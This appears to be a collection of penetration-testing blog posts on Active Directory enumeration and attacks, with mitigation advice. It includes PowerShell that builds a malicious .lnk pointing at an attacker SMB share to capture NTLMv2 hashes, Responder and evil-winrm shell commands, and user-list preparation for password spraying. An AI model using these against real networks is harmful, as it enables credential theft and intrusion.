Enumeration Cheatsheets

Bloodhound Cheatsheet – Custom Queries, Neo4j, etc.

This document contains both Custom Queries that you can import/run directly in Bloodhound, as well as as custom queries that you can run from within the Neo4j GUI directly.


Importing Custom Queries to Bloodhound

CompassSecurity / BloodHoundQueries

There is an awesome project over at https://github.com/CompassSecurity/BloodHoundQueries. You can quickly install the custom queries by running the following commands in Linux.

cd /root/.config/bloodhound
curl -o "customqueries.json" "https://raw.githubusercontent.com/CompassSecurity/BloodHoundQueries/master/customqueries.json"

Once downloaded, just restart Bloodhound and you’ll see the Custom Queries available.


Within Neo4j GUI

In the Neo4j console (by default http://localhost:7474/browser/), you can run your own queries to get data out of the Bloodhound database. I like to do this for ease of copy/paste when report writing.

Find all computers that have an unsupported Operating System.

MATCH (H:Computer) WHERE H.operatingsystem =~ '.(2000|2003|2008|xp|vista|7).' RETURN H.name, H.operatingsystem

Find all enabled users who are member of a particular group, such as Domain Admins.

MATCH (u:User)-[:MemberOf]->(g:Group {name:'DOMAIN ADMINS@<domain>'}) WHERE u.enabled = TRUE return u.name

Find all users that contain a keyword.

MATCH (u:User) WHERE u.name CONTAINS "<keyword>" return u.name, u.displayname, u.description, u.group
Tips & Tricks

How to Export List of Domain Users in Active Directory Without AD Cmdlets

If you find yourself on a workstation that doesn’t have AD Cmdlets installed, you won’t be able to run things like “Get-ADUser. However, you can use the following commands in PowerShell to output a list of domain users and format it in a way that is helpful for password spraying attacks.

# store the results in an array.
$results = net group "Domain Users" /domain

# the size of the header and footer is always the same. select the data between these sections.
$results = $results[8..($results.Length-3)]

# replace the empty spaces with a comma. join on the comma, getting rid of blank lines.
foreach($result in $results) { 
    ($result -replace '\s+',',') -split ',' | ? { $_ } >> 'adusers.txt'
}

Hacking Tutorial

Attacking Active Directory and Open File Shares: Capturing Password Hashes via Malicious LNK Files

If you’ve seen any of my other guides on attacking Active Directory, you’ll have noticed that I love using Responder or Inveigh to capture NTLMv2 hashes. In this tutorial, we’re still going to leverage these tools, but we’re going to force users to send us their hash in a bit different of a way.

Table of Contents:

  • Overview of the Attack
  • Topology of the Network
  • Performing the Attack
  • How Do We Mitigate This?

Overview of the Attack

What is it?

Using PowerShell, we’re able to create our own .lnk file that contains a poisoned icon path. By directing users to a remote SMB share as the file location of the thumbnail, we’re able to force users who access this file share to reach out and make an authentication request to a location that we control.

When can attackers use this?

This attack vector is especially useful in cases where you’ve obtained write access to a publicly accessible file share. If you can drop a specially crafted .lnk file in a location with high traffic, you should be able to capture a large number of NTLMv2 hashes for multiple users.

This can be further chained with SMB Relay attacks in the event that there are machines in the environment with SMB Signing disabled.


Topology of the Network

In our scenario, we have four machines that are all a part of the same internal network.

Windows Server 2019:

  • Acts as the domain controller.
  • Has a FQDN of king.nba.local.
  • IP address is 10.0.1.10
  • Hosts up a file share at \\King\Share

First Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kBryant domain user.
  • IP address is 10.0.1.11
  • O:\ drive is mapped to \\King\Share

Second Windows 10 Machine:

  • Joined to the nba.local domain.
  • Is used by NBA\kIrving domain user.
  • IP address is 10.0.1.200
  • O:\ drive is mapped to \\King\Share

Attacker Kali Linux:

  • Not domain joined.
  • IP address is 10.0.1.5

Performing the Attack

To begin, we need to first create our malicious .lnk file. Since we’ll be using PowerShell, you’ll need access to a Windows machine to generate the file, but it does not need to be domain-joined to the target network.

In a PowerShell prompt, we will create our malicious .lnk file using the following commands:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@threat.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the dir this file lives in will perform an authentication request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Once the commands are ran, it should generate a file to C:\Malicous.lnk. When a user browses to this file, the thumbnail will attempt to load an icon from \\<attackerIP>\@threat.png. This image obviously doesn’t exist, but we can leverage this connection attempt create a challenge that accepts a NTLMv2 hash.

We’ll now rename this file to include an @ symbol in the beginning and give it a less suspicious name. This will force the file to show up at the top of the file-share, which should increase the chances that users browse across it.

Finally, we’ll copy it down to the target network and drop it into a public file share.

With our file planted, let’s head over to our Kali instance, change into our Responder directory, and start up our listener. If you don’t know what this is, check out my guide on LLMNR poisoning at Abusing LLMNR/NBT-NS in Active Directory Domains: Part 1 (Capturing NTLMv2 Hashes).

cd /opt/Responder
sudo python Responder.py -I eth0

Now, let’s simulate a user browsing to this file share. From one of the domain-joined machines, we’ll navigate to the O:\ drive like a real user would do. Right away, we’re able to capture that user’s NTLMv2 hash.

This will continue until the file is removed from the server, which could allow an attacker the ability to capture a large number of NTLMv2 hashes before getting busted.


How Do We Mitigate This?

  • Egress firewall rules. If SMB connections (ports 445 and 139) are not allowed outbound, the attacker would never be able to challenge the request and capture the NTLMv2 hashes of the users.
  • Strict file share permissions. File shares should never allow for anybody to write to them. Users that need write access should be very limited in terms of which directories they can write in, and the principal of least privilege should always be followed.
  • Enforce SMB Signing. While this won’t prevent the attack from occurring, it will limit the impact. If SMB Signing is not required across the network, attackers can easily relay these hashes to authenticate to machines across the domain.
  • Strong Password Policy. Surely you know by now that this is a must-have. A strong password could make these captured hashes useless if SMB Signing is enforced and the hashes are uncrackable.

Enumeration Cheatsheets

Enumerating WinRM (Port 5985)

This post intends to provide a list of helpful commands and tools that you can use when enumerating Port 5985 on a machine. This list is far from exhaustive and will be updated as time progresses.


Getting a Shell w/ EvilWinRM

You can download this tool from Github at the following location.
https://github.com/Hackplayers/evil-winrm

With that tool in hand, we can run the following command to gain a shell as long as you know valid user credentials.

./evil-winrm.rb -u <userAccount> -p <userPassword> -i <targetIP>

Enumeration Cheatsheets

Enumerating DNS (Port 53)

This post intends to provide a list of helpful commands and tools that you can use when enumerating Port 53 on a machine. This list is far from exhaustive and will be updated as time progresses.


Enumerating Hostname of Server

Run the following commands to see if you can make the server leak its own hostname.

nslookup
server <targetIP>
127.0.0.1
127.0.0.2

<targetIP>

Note: It’s probably worth enumerating other live hosts on the network to confirm the domain name is the same.


Performing DNS enumeration with Nslookup

To perform a lookup of the A records against a particular domain:
nslookup <targetDomain>

To look up the mail records:
nslookup -query=mx <targetDomain>

To look up Nameservers:
nslookup -query=ns <targetDomain>

To get all records that are available:
nslookup -query=any <targetDomain>

You can also drop into nslookup with no parameters interactively.
nslookup

While interactively working with nslookup, you can set your query:
set q=mx

You can also set your server if you wanted to query a different DNS server than your default one:
server 8.8.8.8


Performing DNS enumeration with Dig

To extract A records and Namerservers of a domain:
dig <targetDomain>

To query just A records:
dig <targetDomain> A

You can also limit the output to a specific record, and just return the answer section:
dig +nocmd <targetDomain> MX +noall +answer

Can attempt a DNS Zone transfer:
sudo dig @<targetDNSServer> <targetDomain> -t AXFR +nocookie

To see more about a DNS Zone Transfer, see https://infinitelogins.com/2020/04/23/performing-dns-zone-transfer/


Automating DNS Enumeration

Fierce can be used to enumerate subdomains, IP ranges, and hostnames by using public DNS queries, zone transfer attempts, and brute forcing techniques.
fierce -dns <targetDomain>

You can also specify a specific DNS server for the tool to use.
fierce -dns <targetDomain> -dnsserver <targetNamserver>

We can also leverage a tool called DNSEnum to do something similar. It will look for the A records of the target domain, looks up the NS and MX records. Finally, it will attempt a zone transfer attack.
dnsenum <targetDomain>

You can also specify a specific DNS server for the tool to use. Sometimes the results will differ.
dnsenum <targetDomain> --dnsserver <targetNamserver>

You can use DNSEnum to brute force subdomains as well.
dnsenum <targetDomain> -f <dictionaryList>

DNSMap can also be used, but it doesn’t do much other than brute-force with a built-in wordlist.
dnsmap <targetDomain>

DNSRecon is an ‘all-in-one’ tool that can do most everything.
dnsrecon -d <targetDomain>


Using DNSRecon to enumerate hostnames within local subnet.

We can use dnsrecon to attempt a “brute-force” attack by querying IP addresses for associated reverse lookup records.

-n : Will be the nameserver to use.
-r : Will be the network “range” that you want to lookup records for.
--db : Will save the found records to a SQLite DB file.

dnsrecon -n <ipAddr> -r <subnet> --db target.db

If you are unsure of any information, or even what network(s) to perform the lookup for, you can create a bash script that contains multiple commands. For example, we could create enumdns.sh that contains the following:

dnsrecon -n 10.10.10.83 -r 10.0.0.0/8 --db target.db
dnsrecon -n 10.10.10.83 -r 172.16.0.0/12 --db target.db
dnsrecon -n 10.10.10.83 -r 192.168.0.0/16 --db target.db

Running this script will enumerate all possible internal IPs for associated hostname records.


Additional Enumeration Techniques

Update your /etc/resolv.conf file so that you use the target as a DNS server. See what hostnames you can enumerate.

Enumeration Cheatsheets

Enumerating LDAP Port (389)

This post intends to provide a list of helpful commands and tools that you can use when enumerating Port 389 on a machine. This list is far from exhaustive and will be updated as time progresses.


Let’s start by performing a search with simple authentication:

ldapsearch -h <targetIP> -x

If you get results back, let’s run the following command to try and get additional details out.

ldapsearch -h <targetIP> -x -s base namingcontexts

Based on the results, you’ll want to extract details about the primary Domain Component. For example, based on the above output, our next command would look like this.

ldapsearch -h <targetIP> -x -b "DC=htb,DC=local"

This should output a ton of information that you can then redirect to a file. If you do redirect to a file, the following commands may be helpful for extracting specific details.

cat ldap-anonymous.out | grep -i CN=
cat ldap-anonymous.out | grep -i member
cat ldap-anonymous.out | grep -i memberof
cat ldap-anonymous.out | grep -i user


Applying Filters to Queries

If you wanted to query LDAP directly, you can do so by adding your query to the end of your ldapsearch command. For example, we can find details of objects that have a class of “Person” by running the following command:

ldapsearch -h <targetIP> -x -b "DC=htb,DC=local" '(objectClass=Person)'

We can also just extract specific details about those that have a class of Person. For example, we could extract just the SAMAccountName and type.

ldapsearch -h <targetIP> -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName sAMAccountType

Using this method is a great way to create a list of users that you can then use for Password Spraying attacks.

Tips & Tricks

Extracting Password Policy From Domain Machines

Before you start a Password Spraying or Brute Force attack, you always want to check what the password policy is first so you don’t start locking accounts out. This post intends to serve as a guide that lists a handful of ways to enumerate this.


Using CrackMapExec:

crackmapexec smb <targetIP> --pass-pol

If that doesn’t work, you can attempt again with a null authentication attempt by using the following. This typically works when a domain has been upgraded from 2003:

crackmapexec smb <targetIP> --pass-pol -u '' -p ''


Using Enum4Linux:

enum4linux <targetIP>


Using RPCClient:

If the below works, then we may be able to utilize RPC commands to extract details about the user and password policies.

rpcclient -U '' <targetIP>


Using PowerShell:

https://docs.microsoft.com/en-us/powershell/module/addsadministration/get-addefaultdomainpasswordpolicy?view=win10-ps

General Blog

Disabling LLMNR and NBT-NS in Your Network

I’ve made a handful of articles on attacking LLMNR within Active Directory environments, but I’ve never made anything that helps IT Admins mitigate this vulnerability. This post intends to serve as a guide for patching this vulnerability that is enabled by default in Windows.

Keep in mind that we need to not only disable LLMR, but also NBT-NS.

Table of Contents:

  • What is LLMNR & NBT-NS?
  • Great! So how can I exploit this?
  • Eek. So how do we patch this?
    • Disable LLMNR via Group Policy
    • Disable LLMNR via Command Line
    • Disable NBT-NS via Registry
    • Disable NBT-NS via PowerShell

What is LLMNR & NBT-NS?

Crowe.com does a fantastic job at giving you a high-level overview of what NetBIOS & link-local multicast name resolution do. Instead of reinventing the wheel, I will simply provide an excerpt from their website below.

“NetBIOS and LLMNR are protocols used to resolve host names and facilitate communication between hosts on local networks. NetBIOS is generally outdated and can be used to communicate with legacy systems. LLMNR is designed for consumer-grade networks in which a domain name system (DNS) server might not exist.”

If none of this sounds familiar, I highly recommend checking out the below link and reading more about these protocols before moving on.

https://www.crowe.com/cybersecurity-watch/netbios-llmnr-giving-away-credentials


Great! So how can I exploit this?

When a computer requests access to a legitimate network resource, it usually follows a set of pre-defined queries. LLMNR and NetBIOS come into play as last resort options when other methods (such as DNS or local hosts files) don’t prove helpful. Since LLMNR & NetBIOS will attempt name resolution via broadcasted requests to the broadcast-domain, we can set up tools to listen for these requests and respond back pretending to be the intended recipient.

Name Resolution Response Attack

If you’re interested in learning how attackers abuse this protocol, check out one of my guides below.


Eek. So how do we patch this?

Disable LLMNR via Group Policy

In Windows Active Directory, resolving this problem is as simple as applying a GPO. Sign into your Domain Controller and navigate to the Group Policy Management Editor. You’ll want to right click on your FQDN and select Create a GPO in this domain, and Link it here.

Go ahead and give it a name and click OK.

Then you’ll want to right-click on it and select Edit.

Now we just need to navigate to the following policy.

Computer Configuration -> Administrative Templates -> Network -> DNS Client -> Turn Off Multicast Name Resolution

Enable the policy by changing its value to Enabled.

Disable LLMNR via PowerShell / Command Line

But what do you do if you aren’t working with a Windows Active Directory domain? You can still patch this problem using the command line.

REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient”
REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient” /v ” EnableMulticast” /t REG_DWORD /d “0” /f

Disable NBT-NS via Registry

Open the registry by typing Regedit in the run dialogue. Navigate to registry key at the following location.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\

From here, we’ll be presented with multiple keys, each represents a network interface. You’ll want to adjust the NetbiosOptions value on each from the default of zero, to a value of 2.

Disable NBT-NS via PowerShell

To take care of the above mention step via PowerShell, you can run the following commands.

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

That’s it! You should be all set.

Hacking Tutorial

Enumerating Valid Active Directory Usernames with KerBrute

When you come in contact with a Windows domain, you may want to try and leverage Password Spraying attacks (really, you should –they’re super effective). But how do you get a valid list of usernames to load into your password sprayer?


Downloading the Tool

You could leverage a tool called KerBrute to pull this off. A quick Google search on this tool returns the following Github page.

https://github.com/ropnop/kerbrute

You can also download precompiled binaries from the following.

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3


Setting Up our Attack

With the tool in hand, we can view the help documentation.

Now we just need to prepare a list of users to enumerate. If you’ve already started to find usernames around the network, you can make your own customer user list. Otherwise, you can leverage something from the seclists usernames list, which can be downloaded at the following page.

https://github.com/danielmiessler/SecLists

The syntax for the command is very straightforward.

sudo ./kerbrute userenum -d <domain> <userList>

And just like that, we can see that all of the usernames we provided in our file are valid!

Note: It may be worthwhile to add a “known invalid” username to your userlist, just to make sure the server isn’t configured to respond stating all users are valid, whether or not that is true.

Tips & Tricks

Changing Active Directory Password Using smbpasswd

If you’re able to get valid user credentials, but you’re unable to login because the password has expired and/or needs to be changed, you can leverage this tool in Kali Linux.

smbpasswd -U <username> -r <domainController>

Note: You can use either the FQDN of the Domain Controller, or it’s IP address.

This tool will prompt you for the current password of the user, along with what password you desire.